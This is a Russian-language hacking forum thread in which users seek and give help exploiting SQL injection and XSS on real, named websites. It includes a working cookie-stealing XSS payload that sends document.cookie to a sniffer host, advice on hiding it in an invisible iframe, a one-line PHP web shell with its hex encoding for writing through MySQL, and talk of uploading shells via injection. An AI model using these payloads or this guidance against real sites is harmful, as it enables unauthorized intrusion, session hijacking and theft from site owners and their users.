Есть скрипт asp, выводящий новости, в котором подозреваю SQLi Ситуация следующая: когда передаю в id новости кавычку/двойную кавычку или 1'+--+ или 1'+;+ и т.д. он не выводит ничего... Но есть 1 вариант, вывод которого отличается от всех: 1'-- (то есть без пробела после кавычки) в этом случае выплевывает "The server (www.x.com) encountered an error attempting to respond to your request." Почему при этом варианте вывод отличается и какой может быть вид sql-запроса? Подумал что фильтруют пробелы изменил запрос на 1'/**/--/**/ получил вывод с ошибкой как при 1'-- и при 1'/**/or/**/1=1/* аналогично. Еще пробовал подбирать закрывающие скобки, ничего не менялось. Все эти случаи как с 1'--
Добрый день, сть хсс вида: Как сначала отправить на ядовитую ссылку (либо просто слить куки), а потом вернуть юзера на нужную страницу? Проблемма в том, что для кражи куков используется картинка, на которую и идет редирект. А с неё уже не выходит перенаправить( Спасибо.
вопросов на подобии "почему молоко белое, а траву корова ест зеленую?", было предостаточно как и в этой теме, так и в комментариях к одноименным статьям, не ленимся, читаем! p.s. кстати вопрос "почему молоко белое, а траву корова ест зеленую?", на мой взгляд гораздо интереснее, и не совсем понятно все таки почему. p.p.s. теперь мне понятно:
Приветствую, при запросе ( search_result.php?search=1 ') выдаёт Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/piluli/deploy/releases/20120405144039/public/search_result.php on line 393 стоит ли ковырять дальше ?
Вопрос такого плана. Эта вроде скуля, но не раскручивается никак. или я что то не понимаю. подскажите плиз с раскруткой. http://bdsmpeople.ru/search/index.php?input_action=search&input_who1=&input_who2='&input_bdsm_position=&input_age1=&input_age2=&input_country_id=0&input_state_id=0&input_city_id=0 параметр input_who2 вот ошибка You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND (birthday BETWEEN '19120407' AND '19940407') AND (status='0')' at line 4
У меня маленький вопросец, залил шел через скулю открываю его, а мне пишет хотел создать свой .htaccess с содержимым но мне пишет что етот файл уже существует, можно ли ещо чёнибуть придумать?
site.com/index.php?id="><img+src=1+onerror="(new+Image()).src='//sniffer.com/test.jpg?'%2Bescape(document.cookie) Судя по "> в начале XSS, закрывать обработчик onerror и тег img не нужно. Для незаметной эксплуатации вставляешь ссылку в скрытый фрейм и размещаешь его на своем сайте: <iframe style="width:0px;height:0px;visibility:hidden" src="//site.com/index.php?id="><img src=1 onerror="(new Image()).src='//sniffer.com/test.jpg?'+escape(document.cookie)"></iframe> Внутри фрейма в атрибуте src не забывай заменять двойные кавычки на html-сущности (", " или "). Также внутри src не используй urlencode, как в прямой ссылке, пробелы остаются пробелами, плюсы - плюсами. Домен сниффера отличается от домена XSS
Пытаюсь залить шелл через mysql(f_p =Y). Мой запрос выглядит так: Вылетает такая ошибка. (Шелл на сайт уже заливал кто-то, сапа стоит)
попробуй этот код за хексить <? system($_REQUEST['cmd']); ?> получится 0x3c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e
Для примера я хотел записать в файл user(), что из этого вышло можешь почитать немного выше... Разобрался. Так выводит 13 ошибку, а это - ошибка записи.
